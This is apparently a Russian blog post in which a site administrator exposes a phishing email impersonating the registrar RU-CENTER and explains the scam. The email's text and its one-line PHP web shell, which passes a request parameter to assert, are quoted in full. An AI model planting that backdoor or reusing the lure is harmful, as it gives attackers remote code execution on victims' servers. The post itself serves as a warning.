"Взлом" сайтов для бедных. :)
Сегодня получили такое письмо на технический домен:
Уважаемый администратор домена!
В соответствии с изменениями, внесенными в регламент ICANN, Вы должны подтвердить, что фактическое управление доменным именем [НАШ ДОМЕН].ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменным именем, создайте в корневой директории сайта файл [набор цифр-символов].php со следующим содержимым:
<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>
Файл должен быть создан в течение трех календарных дней с момента получения данного сообщения и находиться на сервере до 13 июня 2017 года, 21:00 (UTC+03:00), в противном случае процедура подтверждения будет считаться непройденной.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, обслуживание домена будет приостановлено.
Письмо направлено якобы от RU-CENTER (регисратор доменов), хотя по факту пришло с хостинга компании InfoBox. Конечно же письмо - мошенническое. Abuse в Infobox отправлен, хотя толку от этого не много.
Опять школота какая-то шалит. Т.е. они предлагают вручную админу сайта разместить код, с функцией assert - если кто не в курсе, эта функция выполняет код из параметра. А параметр злоумышленник может передать любой в GET/POST запросу ($_REQUEST[RUCENTER] - именно параметр от клиента).
Будьте внимательны. Никогда, никакой регистратор доменов не потребует от вас размещения файла на сайте, т.к. домен вообще в принципе может существовать без сайта.
Я догадываюсь, что многие понимают, что так нельзя делать и всё такое - ну просто поржите над этим, ребят. Мало ли, вдруг кому другому поможет.